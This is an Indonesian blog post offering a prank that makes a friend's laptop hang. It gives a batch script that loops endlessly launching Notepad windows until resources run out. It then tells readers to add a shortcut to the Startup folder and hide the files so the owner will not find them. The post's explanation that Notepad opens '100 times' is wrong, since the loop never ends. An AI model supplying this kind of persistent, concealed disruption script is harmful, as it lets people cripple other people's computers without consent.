Husni Khotim. Diberdayakan oleh Blogger.

Follow Me

17 Juni 2012

Jail dengan membuat laptop teman anda menjadi hang 100 %


Tips Membuat Laptop 100 % Hang

Trik yang satu ini jelas membahayakan laptop yang terkena Trik yang satu ini jadi hati-hati dalam menggunakan trik ini. Mau tau cara x nge-hangin laptop hanya dengan sebuah aplikasi ari windows yaitu “NOTEPAD”...?? Ok langsung Cekidot. . . .
1.    1.  Jalankan Notepad kemudian Tulis Script ini Di Notepad
@ECHO off
: top
START %SystemRoot%\system32\notepad.exe
GOTO top

2.      2.Selanjutnya simpan dalam format file batch. Klik menu File -> Save As... Example namanya Bikin hang.bat dan ubah bagian  Save as type Menjadi All File Klik tombol Save. . . .

3.                  Eitzzz,,, trik ini saya jamin 200 % dapat menyebabkan hang pada sistem laptop anda. Jadi sebelum mencoba lebih baek back up data dan create system restore terlebih dahuluNah apa yang menyebabkan sistem laptop anda jadi error, lambat, dan “HANG” ...??
      Penyebabnya file batch yang diselipi script secara otomatis akan menjalankan notepad sebanyak 100 kali. It’s artinya ada 100 jendela notepad yang ditampilkan pada desktop... !!!
      Nah  itulah yang menyebabkan sistem laptop anda jadi error, lambat, dan “HANG” ! because banyaknya resource- resource file notepad yang harus dibaca oleh memori dan juga prosesor komputer. Untuk mengatasi hal ini adalah.... matikan Laptop anda secara langsung dengan menekan tombol power.... If anda berminat menggunakan trik saya maka cukup membuat shortcut nya lalu pindahkan ke dalam folder starUp. And hiden file batch and shortcut agar tidak diketahui oleh pemilik laptop yang sedang anda jahili hehehehe.....
                                             

1 komentar

Unknown 27 Oktober 2015 pukul 18.02

gan kalo mengembalikan seperti semula bagemana?

Posting Komentar

Thank's For Visit To MY Blog !